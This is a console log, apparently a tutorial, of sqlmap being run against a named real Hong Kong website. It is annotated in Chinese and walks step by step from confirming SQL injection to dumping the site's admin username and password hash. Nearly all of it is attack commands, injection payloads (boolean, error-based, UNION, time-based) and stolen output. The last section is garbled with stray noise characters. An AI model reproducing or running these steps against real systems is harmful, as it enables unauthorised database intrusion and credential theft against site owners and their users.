D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin |
| article |
| contributor |
| idea |
| image |
| issue |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(11) |
| password | varchar(32) |
| type | varchar(10) |
| userid | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
0 i! A4 R! Y- D" r* U( }# Mrecognized possible password hash values. do you want to use dictionary attack o0 b% k# a2 a. y4 Q
n retrieved table items? [Y/n/q] y
( ]7 ]+ G8 E- Z4 M" n* bwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
6 @9 j. I0 y% M# }/ D* }1 bdo you want to use common password suffixes? (slow!) [y/N] y P( H" W j& P1 B( Z; R
Database: wepost
1 w0 g3 s" G) q @7 w( xTable: admin
% x4 |- i6 `% ~8 x ^$ Y: [[1 entry]+ y+ ]1 D# l* o' w
+----------------------------------+------------+/ b2 c1 H9 C' t1 c
| password | userid |$ G& W0 t! ~$ n/ V7 F
+----------------------------------+------------+* Y |& S. ?( T" \4 ~" F% }- s' v
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |+ F+ Q. z: B h; G
+----------------------------------+------------+' e, O- c) \9 M3 ~9 L( ]7 y
shutting down at: 16:58:14" n1 W* W/ D: t8 B
6 f# Q' g( l6 t
D:\Python27\sqlmap> |